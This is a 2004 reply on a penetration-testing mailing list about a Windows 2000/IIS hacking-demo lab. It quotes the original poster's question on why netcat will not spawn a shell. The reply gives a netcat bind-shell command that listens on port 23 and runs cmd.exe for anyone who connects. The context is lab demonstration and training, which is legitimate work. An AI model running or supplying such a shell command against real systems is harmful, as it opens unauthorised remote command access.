RE: Hacking Demo and Test Lab

["Grissett, Chris CONT Ciber" <Chris.Grissett.Ciber () usarc-emh2 army mil>]

Try this command on the remote machine
nc -l -p 23 -t -e cmd.exe 

This allows nc to listen on port 23 for connections.  When a connection is
made it will spawn a cmd[dos] shell, or whatever program you want to exec.
Hope that helps.  If that fails, you can really impress the execs by using
knoppix-std (http://knoppix-std.org), to do all your hacking demos.  Or if
you'd like, you could give me access to your lab, and Id do it for you.  I'm
kidding, of course I couldn't do that, plus it would violate numerous laws
and ethics :)  Are you familiar with linux?

Christopher Grissett
Security Analyst
Network Enterprise Security Team

-----Original Message-----
From: raza sharif [mailto:raza () raza demon co uk] 
Sent: Friday, June 11, 2004 7:42 AM
To: pen-test () securityfocus com
Subject: Hacking Demo and Test Lab



Hi Folks , 

Im doing some advanced Hacking Demos for management and also Corporates etc.

I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.

Im using Webdav and other exploits that all basically should spawn a shell
using netcat.

Im using XP as my attacking machine.

Prob at the moment is Netcat will not spawn a shell regardless of what i
try.

Any ideas ? i checked the install it is windows 2000 500.1295 no reference
to service packs etc. it's a default install.

Also what are good demo's etc to run to show real hacking on windows 2000 ,
iis etc..that i can get to work

thanks

Raza

Raza () raza demon co uk